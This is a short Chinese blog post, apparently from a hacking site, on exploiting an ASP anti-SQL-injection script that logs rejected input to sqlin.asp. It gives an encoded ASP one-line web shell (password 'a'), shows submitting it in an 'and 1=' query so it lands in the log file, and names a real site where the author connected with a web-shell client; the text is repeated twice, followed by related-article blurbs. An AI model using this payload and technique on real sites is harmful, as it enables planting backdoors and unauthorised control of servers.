SQL通用防注入系统asp版漏洞
发布时间:2012-05-15 11:15:08 作者:佚名 我要评论
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
既然做了记录,再查看了下它的记录文件
于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的
┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾
http://www.jnb1.net/sqlin.asp 菜刀连接之,成功
+----------------------------------------+
其实过程并不难,也没什么技术难度,但是有时遇到这种记录注入错误的网站,多个便捷途径还是不错的。还有,另外百度了下,发现半坑土农民曾经发现了类似的,但是,额,去他博客看时 , 瀑布汗
既然做了记录,再查看了下它的记录文件
于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的
┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾
http://www.jnb1.net/sqlin.asp 菜刀连接之,成功
+----------------------------------------+
其实过程并不难,也没什么技术难度,但是有时遇到这种记录注入错误的网站,多个便捷途径还是不错的。还有,另外百度了下,发现半坑土农民曾经发现了类似的,但是,额,去他博客看时 , 瀑布汗
相关文章
- sqlmap 是一个自动SQL 射入工具。本文收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎接楼补充、分享。2014-07-29
- 近日,网站频频被黑。在网站里莫名其妙的多出一篇文 章,还有多出一组贴图。正在纳闷是谁可以登陆我的后台发表文章和图片的时候,我的qq弹出消息,一个陌生人给我发消息,2012-09-28
- Structured Query Language即结构化查询语言,用于操作关系型数据库管理系统,本文给大家介绍SQL注入及危害、防御手段的处理方法,感兴趣的朋友跟随小编一起看看吧2022-10-10
最新评论